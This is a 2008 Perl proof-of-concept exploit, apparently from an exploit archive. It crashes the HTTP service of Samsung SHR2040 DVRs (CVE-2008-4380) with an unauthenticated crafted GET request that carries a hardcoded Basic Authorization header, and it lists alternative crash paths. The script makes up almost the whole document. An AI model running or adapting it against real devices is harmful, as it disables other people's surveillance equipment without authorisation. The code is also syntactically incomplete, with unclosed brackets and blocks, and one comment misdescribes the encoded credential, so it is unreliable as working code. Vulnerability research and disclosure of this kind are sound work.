Samsung DVR SHR2040 - HTTPd Remote Denial of Service Denial of Service (PoC)

Related Vulnerabilities: CVE-2008-4380  
Publish Date: 07 Sep 2008

                #!/usr/bin/perl -w
# Samsung DVR SHR2040 HTTPD Remote Denial of Service DoS PoC
# The vulnerability is caused due to an unspecified error in the cgis
# files filter used for configure propierties. This can be exploited by
# sending a specially crafted HTTP request (NO necessary authentication), 
# which will cause the HTTP service on the system to crash.
# Requisites: Test default ports:
# 554/tcp open rtsp
# 557/tcp open openvms-sysipc
# The vulnerability has been reported in versions Samsung DVR
# Firmware Version B3.03E-K1.53-V2.19_0705281908, Model = SHR2040
# More information:
# Very special credits: str0ke, Kf, rathaous, !dsr, 0dd.
# and friends: nitr0us, crypkey, dex, xdawn, sirdarckcat, kuza55,
# pikah, codebreak, h3llfyr3, canit0.
# Alex Hernandez ahernandez [at] sybsecurity dot com

use strict;
use LWP;
use Data::Dumper;
require HTTP::Request;
require HTTP::Headers;

my $string = 	"/x";				# Strings to send
my $method = 	'GET';				# Method "GET" or "POST"
my $uri = 	'';	# IP address:port (change this)
my $content = 	"/test.html";			# Paths to crash

#my $content = 	"/first.htm";
#my $content = 	"/content_frame.htm?cgiName=";
#my $content = 	"/index_menu.htm?lang=en&topMenu=";

my $headers = HTTP::Headers->new(

'Accept:'               => '*/*',
'Referer:'       	=> 'http://$1$9hC8DmrL$8NG8i3pQXBabAKo.AIm8U.:12345@',
'Accept-Language:'     	=> 'en-us,en;q=0.5',
'UA-CPU:'          	=> 'x86',
'Accept-Encoding:'      => 'gzip, deflate',
'User-Agent:'   	=> 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Host:'          	=> '',
'Connection'          	=> 'keep-alive',
'Authorization:'	=> 'Basic JDEkOWhDOERtckwkOE5HOGkzcFFYQmFiQUtvLkFJbThVLjoxMjM0NQ==', # base64 encode ADMIN:12345


my $request = HTTP::Request->new($method, $uri, $headers, $content, $string);

my $ua = LWP::UserAgent->new;
my $response = $ua->request($request);

print "[+] Denial of Service exploit for Samsung SHR2040 Final\n";
print "[+] Coded by: Alex Hernandez [ahernandez\]\n";
print "[+] We got this response from DVR: \n\n" . $response->content . "\n";

my $data;
	foreach my $pair (split('&', $response->content)) {
 		my ($k, $v) = split('=', $pair);
		$data->{$k} = $v;

if ($data->{RESULT} != 0) {

	print "[+] Denial of Service exploit for Samsung SHR2040 Final\n";
	print "[+] Coded by: Alex Hernandez[ahernandez\]\n";
	print "[+] Use:\n";
	print "\tperl -x\n";
 	print $data->{RESPMSG} . "\n";

} else {

 	print "[+] Denial of service Exploit successed!!!\n";
	print "[+] By Alex Hernandez[ahernandez\]\n";


# [2008-09-07]